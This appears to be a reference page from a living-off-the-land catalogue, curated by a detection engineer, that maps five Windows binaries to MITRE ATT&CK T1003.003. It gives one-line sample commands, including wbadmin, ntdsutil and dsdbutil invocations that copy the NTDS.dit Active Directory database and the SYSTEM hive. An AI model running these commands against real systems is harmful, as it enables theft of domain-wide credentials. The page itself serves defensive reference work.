T1003.003Tactic: Execution & Defense EvasionOfficial MITRE ATT&CK Page

T1003.003: Technique T1003.003

Adversaries may leverage living-off-the-land techniques (T1003.003) to achieve execution, evade defenses, or transfer tools.

Total Capable Binaries: 5
Windows: 5
Linux: 0
macOS: 0

Living-off-the-Land Matrix for T1003.003

Across 5 verified binaries
Windows2 payloads

Diskshadow.exe

Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).

Sample Attack Vector:
diskshadow.exe /s {PATH:.txt}
Windows6 payloads

Esentutl.exe

Binary for working with Microsoft Joint Engine Technology (JET) database

Sample Attack Vector:
esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o
Windows2 payloads

wbadmin.exe

Windows Backup Administration utility

Sample Attack Vector:
wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet
Windows5 payloads

dsdbutil.exe

Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory.

Sample Attack Vector:
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
Windows1 payloads

ntdsutil.exe

Command line utility used to export Active Directory.

Sample Attack Vector:
ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q
Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection EngineerCheck Point